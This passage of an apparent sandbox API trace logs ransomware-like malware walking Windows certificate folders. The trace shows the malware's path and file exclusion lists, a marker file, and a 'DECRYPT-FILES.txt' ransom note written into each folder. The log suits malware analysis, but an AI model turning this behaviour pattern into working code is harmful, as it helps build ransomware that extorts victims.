HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.539] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.539] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="AhnLab") returned 0x0 [0078.539] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.539] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 78 [0078.539] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.539] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\jkbimi8.tmp") returned 90 [0078.539] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0078.540] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 78 [0078.540] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.540] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\DECRYPT-FILES.txt") returned 96 [0078.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0078.541] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0078.543] CloseHandle (hObject=0x454) returned 1 [0078.543] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 78 [0078.543] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0078.543] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0078.543] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.543] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.543] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.543] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.543] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0078.543] lstrcmpW (lpString1="Certificates", lpString2=".") returned 1 [0078.543] lstrcmpW (lpString1="Certificates", lpString2="..") returned 1 [0078.543] lstrcatW (in: lpString1="Certificates", lpString2="\\" | out: lpString1="Certificates\\") returned="Certificates\\" [0078.543] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="Certificates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" [0078.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Program Files") returned 0x0 [0078.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch=":\\Windows") returned 0x0 [0078.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Games\\") returned 0x0 [0078.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\All Users") returned 0x0 [0078.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="AhnLab") returned 0x0 [0078.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 91 [0078.544] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.544] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\jkbimi8.tmp") returned 103 [0078.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0078.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 91 [0078.544] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.544] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\DECRYPT-FILES.txt") returned 109 [0078.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0078.545] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0078.546] CloseHandle (hObject=0x45c) returned 1 [0078.546] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 91 [0078.546] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0078.547] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0078.547] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.547] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.547] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.547] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.547] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.547] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.547] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.547] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.547] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.547] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.547] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.547] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.547] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 91 [0078.547] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.547] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" [0078.547] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\jkbimi8.tmp" [0078.547] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.548] CloseHandle (hObject=0x0) returned 0 [0078.548] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.548] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.548] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0078.548] CloseHandle (hObject=0x458) returned 1 [0078.548] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0078.548] lstrcmpW (lpString1="CRLs", lpString2=".") returned 1 [0078.549] lstrcmpW (lpString1="CRLs", lpString2="..") returned 1 [0078.549] lstrcatW (in: lpString1="CRLs", lpString2="\\" | out: lpString1="CRLs\\") returned="CRLs\\" [0078.549] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CRLs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Program Files") returned 0x0 [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch=":\\Windows") returned 0x0 [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Games\\") returned 0x0 [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\All Users") returned 0x0 [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="AhnLab") returned 0x0 [0078.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.549] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 83 [0078.549] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.549] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\jkbimi8.tmp") returned 95 [0078.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0078.549] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 83 [0078.550] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.550] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\DECRYPT-FILES.txt") returned 101 [0078.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0078.550] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0078.551] CloseHandle (hObject=0x45c) returned 1 [0078.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 83 [0078.551] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0078.551] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0078.551] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.551] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.551] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.551] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.551] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.551] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.551] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, 